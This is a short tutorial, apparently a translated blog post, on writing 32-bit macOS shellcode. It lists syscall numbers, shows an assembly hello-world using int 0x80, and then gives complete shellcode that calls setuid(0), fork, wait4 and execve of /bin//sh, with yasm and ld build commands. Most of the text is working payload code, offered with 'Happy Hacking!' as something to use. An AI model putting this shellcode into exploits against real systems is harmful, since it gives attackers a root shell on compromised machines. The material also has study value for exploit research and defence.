We will make a basic shellcode (setuid + fork + execve wait4 +) for 32-bit Intel architecture.
The first is to check the syscall.h file.
Kana:osx capi_x$ cat /usr/include/sys/syscall.h
#ifdef __APPLE_API_PRIVATE
#define SYS_syscall 0
#define SYS_exit 1
#define SYS_fork 2
#define SYS_read 3
#define SYS_write 4
#define SYS_open 5
#define SYS_close 6
#define SYS_wait4 7
This is a small proof of concept (a "hello girls" in asm) demonstrated the feasibility via INT 80h.
section .text
global _start
_start:
push len
push msg
push 0x1
mov eax, 0x4
sub esp, 0x4 ; Stack align
int 0x80 ; write
mov eax, 0x1
sub esp, 0x4
int 0x80 ; exit
section .data
msg db 'Hola nenas!', 0xa
len equ $ - msg
Kana:osx capi_x$ file hello
hello: Mach-O executable i386
Kana:osx capi_x$ ./hello
Hola nenas!
Looking at the results, it should be a shellcode such as whole life, taking care of esp and compiling for 32bit Match-O.
And here is the result, nothing really awesome, but it sure someday is useful :-)
section .text
global _start
_start:
xor eax, eax
push eax
push eax
mov al, 23
int 0x80 ; setuid
pop eax
inc eax
inc eax
int 0x80 ; fork
pop ebx
push eax
push ebx
push ebx
push ebx
push eax
xor eax, eax
mov al,7
push eax
int 0x80 ; wait4
xor eax, eax
push eax
push 0x68732f2f ; //sh
push 0x6e69622f ; /bin
mov ebx, esp
push eax
push esp
push esp
push ebx
mov al, 0x3b
push eax
int 0x80 ; execve
I will compile them with yasm, which has support for 64 bit :-)
yasm -f macho32 forkexecve32.s -o forkexecve32.o
ld -static forkexecve32.o -o forkexecve32
Happy Hacking!
–
“No user serviceable parts included.”